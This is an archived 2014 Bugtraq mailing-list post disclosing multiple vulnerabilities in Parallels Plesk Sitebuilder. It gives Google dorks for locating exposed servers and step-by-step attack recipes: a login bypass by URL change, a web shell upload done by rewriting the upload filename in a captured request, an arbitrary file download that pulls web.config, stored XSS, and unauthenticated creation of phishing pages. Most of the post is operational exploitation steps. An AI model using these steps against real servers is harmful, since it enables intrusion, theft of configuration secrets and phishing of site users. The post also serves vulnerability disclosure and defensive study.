| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 23 Jul 2014 05:15:52 GMT From: cseye_ut@...oo.com To: bugtraq@...urityfocus.com Subject: Multiple Vulnerabilities in Parallels® Plesk Sitebuilder #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder # Author : alieye # vendor : http://www.parallels.com/ # Contact : cseye_ut@...oo.com # Risk : High # Class: Remote # # Google Dork: # inurl::2006/Sites ext:aspx # inurl::2006 inurl:.ashx?mediaid # intext:"© Copyright 2004-2007 SWsoft." ext:aspx # inurl:Wizard/HostingPreview.aspx?SiteID # # Date: 23/07/2014 # os : windows server 2003 # poc video clip : http://alieye.persiangig.com/video/plesk.rar/download #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1-bypass loginpage (all version) http://victim.com:2006/login.aspx change url path to http://victim.com:2006/wizard --------------------------------------------------------- 2-uploading shell via Live HTTP Headers(version "2004-2007") Tools Needed: Live HTTP Headers, Backdoor Shell Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers Step 3: Replay data with Live HTTP Headers - Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n] Step 5: go to shell path: http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp --------------------------------------------------------- 3-Arbitrary File Download Vulnerability(all version) You can download any file from your target http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename example: http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config --------------------------------------------------------- 4-xss(all version) you can inject xss code in all module of this page http://sitebuilder.cp.collaborationhost.net/Wizard/Edit.aspx goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :) --------------------------------------------------------- 5-not authentication for making a website(all version) making malicious page and phishing page with these paths http://victim.com:2006/Wizard/Pages.aspx http://victim.com:2006/Wizard/Edit.aspx #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir [#] Thanks To All cseye members and All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To Master of Persian Music: Hossein Alizadeh [#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/ [#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by blists - more mailing lists